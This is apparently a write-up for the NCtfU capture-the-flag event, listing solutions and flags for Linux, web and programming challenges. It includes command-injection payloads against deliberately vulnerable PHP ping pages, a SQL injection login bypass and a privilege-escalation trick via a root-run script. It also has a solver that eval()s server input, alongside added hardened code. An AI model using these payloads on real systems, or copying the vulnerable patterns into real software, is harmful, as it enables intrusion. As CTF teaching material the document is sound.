NCtfU Writeup

All flags have a hash as the suffix, which lets the organizers check whether a user is submitting their own flag; so don't cheat.

Basic Linux

Super Secure Shell

Login using ssh (usr:ctf,psw:w3lc0m3_t0_NCtfU)

flag:NCtfU{S3CUR3_SH3L1_d1b639f0b0e34a5b990a174f2f2a77fd}

Long Shopping List

ls is a good command

flag: NCtfU{1_4M_4_SC4RY_GH05T_N07_4_SH0PP1NG_L1S7_5894fc7602db45089b86b9f3f11b14ff}

Cute Cat

cat the flag

flag: NCtfU{CA75_4R3_S0OO0O0O00O0O00OOO0OO0OOOO0O_G00OOOO0OO0O00O0OD_8214817b2d724f38a280efd1bf3d015a}

Where is my change?

cd into the directory

flag: NCtfU{G0OD_U_F0UND_MY_CH4NG3!_fe16dcb368f94b9b8ce0755a5e9867e7}

Hidden Shopping List

sometimes you just need a -a for ls

flag: NCtfU{B0OOO00OOO00000000_1_SC4R3D_U_d7621beb3d1d4084a80a3a0d9cf4fa9a}

Grapes

$cat grapes | grep "NCtfU" for the solution

flag: NCtfU{D3AL_W17H_GR3P_135c8b583aa74d2a925a9be94faed74b}

Hide and Seek

sometimes a TAB is a great thing when you have no idea how to pipe it

flag: NCtfU{F1ND_U_L1T7L3_FL49_cd0af659d4ba4feebf4b38a31747513c}

Nice Environment

such an easy $env

flag: NCtfU{0H_1_L0V3_7H15_3NV_bef142acc7fc48a19342365342853d2c}

Run

run the ELF: $./run

flag: NCtfU{RUN_F0R_UR_L1F3_9c5a606412f7422892c97704e1ab6e64}

Bugs

remove the bugs $rm bugs

flag: NCtfU{N0_NO7_4_51N9L3_BU9_C4N_B3_1N_MY_S19H7_067368c08061475987a613ecbaaf0443}

MOO

The flag is at the daily message file!
$cat /etc/update-motd.d/10000-moo

flag: NCtfU{MO0O_MO7D_M0O0_3798ea5955b248b48a4cdae315fc0d99}

You Shall Not Pass

$chmod 777 flag

flag: NCtfU{N0_0N3_C4N_S70P_M3_N0_0N3_06c0f09daef34d6892fa59d6e28118f9}

Flag Printer

Hint: you can cat an ELF too!!

flag: NCtfU{F0UND_M3_1N_7H3_S0URC3_d3ccf6384ea64f18b3e9a9770f8584d7}

Running Flag

$ps -ax

flag: NCtfU{U_H4V3_C47CH_7H3_RUNN1N9_FL49_1259eb4388cd41b8983518dc0bb3bfa6}

You Shall Not Pass Revenge

$echo chmod 777 flag > update.sh

flag: NCtfU{U_C4N_RUN_W17H_R0OT_3VEN_U_4R3_N07_ROOT_US3R_73a096095c814d7fae5d683240c406bb}


Web

Baby Web Ping

A basic command injection, no need to bypass.
code:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
<form action="." method="GET">
CMD: <input type="text" name="cmd" value="ping www.google.com.tw"> <input type="submit" value="run command!">
</form>
<pre><?php

set_time_limit(2);

if(!empty($_GET['cmd']))
    echo htmlentities(system($_GET['cmd']));
else
    highlight_file(__FILE__);
?></pre>
</body>
</html>

payload: cat flag

flag: NCtfU{B4D_BAD_P1N9_dfe60bb115ae4df88795170a7bbdea6a}

Easy Web Ping

Need pipe to bypass it.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
<form action="." method="GET">
Ping: <input type="text" name="ping" value="www.google.com.tw"> <input type="submit" value="run command!">
</form>
<pre><?php

set_time_limit(2);

if(!empty($_GET['ping']))
    echo htmlentities(system('ping -c 4 '.$_GET['ping']));
else
    highlight_file(__FILE__);
?></pre>
</body>
</html>

payload: |cat flag

flag: NCtfU{H0W_D1D_U_U53_AN07H3R_CMD_561afb86e8934bff84e02ac74134c1bd}
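Both ping challenges fall to the same bug: the query value is concatenated into a shell command, so a pipe or any other shell metacharacter starts a second command. Below is an added example (not the challenge's code) of the "Easy Web Ping" handler with the injection closed; the function name validate_ping_target is my own.

```php
<?php
// Added example, not the challenge's code: the "Easy Web Ping" handler hardened.
// The original runs system('ping -c 4 ' . $_GET['ping']), so "|cat flag" makes the
// shell start a second command. Two layers fix that: an allow-list for what a ping
// target may look like, and escapeshellarg() so the value reaches the shell as one
// literal word.

function validate_ping_target(string $raw): ?string {
    $raw = trim($raw);
    if (filter_var($raw, FILTER_VALIDATE_IP) !== false) {
        return $raw;                                   // IPv4 or IPv6 literal
    }
    // Hostname: dot-separated labels of [A-Za-z0-9-], 1-63 chars, no leading or
    // trailing '-'. Rejecting a leading '-' also stops the value from being parsed
    // as a ping option.
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    if (strlen($raw) <= 253 && preg_match("/^{$label}(?:\\.{$label})*$/", $raw) === 1) {
        return $raw;
    }
    return null;
}

set_time_limit(2);

if (!empty($_GET['ping'])) {
    $target = validate_ping_target((string) $_GET['ping']);
    if ($target === null) {
        http_response_code(400);
        echo 'invalid ping target';
    } else {
        // escapeshellarg() single-quotes the argument, so '|', ';', '&&', '$(...)'
        // and backticks inside it are plain characters. The output is captured and
        // escaped as a whole; the original's htmlentities(system(...)) only escaped
        // the last line, because system() writes the rest straight to the response.
        $out = shell_exec('ping -c 4 ' . escapeshellarg($target) . ' 2>&1');
        echo htmlentities((string) $out, ENT_QUOTES, 'UTF-8');
    }
} else {
    highlight_file(__FILE__);
}
```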

Beautiful Website 1

  1. Found a hidden page in anime_girls’ page
  2. Edit page 302 to login
    <?php
    header('Location: /?page=login');
  3. Test the login form with basic sql injections
    payload: 1' or 1=1 -- -
  4. Get all pages with the source viewer

flag: NCtfU{an_easy_flag_for_you_9fc38735e2d74b07b411b5cd45a9378d}

Beautiful Website 2

Question said that the flag is the user’s password

  1. As in Beautiful Website 1, we can see the source code of panel.php and find out how the site confirms whether the user is logged in or not
    if (!isset($_COOKIE['token'])) {
        header('Location: /');
        die();
    }
    [$data, $sig] = explode('.', $_COOKIE['token']);
    if (md5($data . $_ENV['SALT']) !== $sig) {
        header('Location: /');
        die();
    }
    $user = json_decode(base64_decode($data), true);
  2. Now we know the cookie is named token and looks like base64(json).md5(sth)
  3. Base64-decode the front part of the cookie
  4. After decoding you'll get something like
    {"user":"user","pass":"NCtfU{sql_injection_strikes_again_fc08d00973c94001a32c82184e10f23d}","is_admin":"0","is_enabled":"1"}
    flag: NCtfU{sql_injection_strikes_again_fc08d00973c94001a32c82184e10f23d}
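The decode step works because the front part of the token is only encoded, not encrypted: anyone holding the cookie can read the password without knowing SALT. The added example below (not the challenge's code) reproduces panel.php's token layout to show that, and then a safer layout that keeps the password out of the cookie. The salt, user data and key are constructed sample values; the function names are my own.

```php
<?php
// Added example, not the challenge's code. It mirrors the token layout panel.php
// checks (base64(json) . "." . md5(base64(json) . SALT)) to show why step 3 of the
// writeup needs no secret, then a safer layout. All values below are constructed.

const SAMPLE_SALT = 'sample-salt-not-the-real-one';

// Same scheme as the challenge: the payload is base64 JSON, the "signature" is
// md5 over that payload plus the salt. Only the md5 depends on SALT.
function issue_legacy_token(array $user, string $salt): string {
    $data = base64_encode(json_encode($user));
    return $data . '.' . md5($data . $salt);
}

// What the writeup does: split on '.', base64-decode the front part. The password
// travels in the cookie in the clear, readable by anyone who sees the cookie.
function read_token_payload(string $token): ?array {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    $json = base64_decode($parts[0], true);
    $user = $json === false ? null : json_decode($json, true);
    return is_array($user) ? $user : null;
}

// Safer layout: the cookie carries an opaque session id only; password, is_admin
// and is_enabled stay server-side in the session store. HMAC-SHA256 with a
// dedicated key replaces the home-made md5(data . SALT), and hash_equals()
// keeps the comparison constant-time.
function issue_session_token(string $session_id, string $key): string {
    return $session_id . '.' . hash_hmac('sha256', $session_id, $key);
}

function verify_session_token(string $token, string $key): ?string {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    [$sid, $sig] = $parts;
    return hash_equals(hash_hmac('sha256', $sid, $key), $sig) ? $sid : null;
}

$legacy = issue_legacy_token(
    ['user' => 'user', 'pass' => 'SAMPLE-PASSWORD', 'is_admin' => '0', 'is_enabled' => '1'],
    SAMPLE_SALT
);
var_dump(read_token_payload($legacy)['pass']);     // readable without SAMPLE_SALT

$key = 'sample-hmac-key';
$tok = issue_session_token(bin2hex(random_bytes(16)), $key);
var_dump(verify_session_token($tok, $key) !== null);
var_dump(verify_session_token($tok . 'x', $key));  // tampered signature is rejected
```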

Advanced Linux

Is this zip?

No it isn’t.
$file a_zip.zip
>a_zip.zip: PNG image data, 324 x 332, 8-bit/color RGB, non-interlaced
$mv a_zip.zip a_zip.png

flag: NCtfU{F1L3_E*73N510N_5UCKS}

Running Flag Revenge

First, find the process ID of the running program

PID: 17

Then: $cat /proc/17/exe

flag: NCtfU{7H3_FL49_H1DD3N_1N_7H3_PR0C3SS_020fb342d8394b8c92df93f50a475691}


Programming

Online Judge

from pwn import *

conn = remote('nctfu.csie.ncu.edu.tw', 23807)

def rl():
    # read one line from the judge
    return conn.recvline().decode('utf-8').strip('\n')

def rtl():
    # read up to the next "ans:" prompt
    return conn.recvuntil('ans:').decode('utf-8').strip('\n')

print(rl())
print(rl())
haha = 0
while 1:
    if (haha == 1000):
        # after 1000 answers, read the final line (the flag) and stop
        ans = conn.recvuntil('\n').decode('utf-8').strip('\n')
        print(ans)
        break
    s = rtl()
    print(s)
    # keep only the expression in front of the "ans:" prompt
    s = s.split(':')[-2].strip(' ').strip('\nans')
    print(str(eval(s)))
    conn.sendline(str(eval(s)))
    haha += 1

flag: NCtfU{U_4R3_F45T_W17H_T0OL5_fe2e7c89a61943349d60d90d25b3a07d}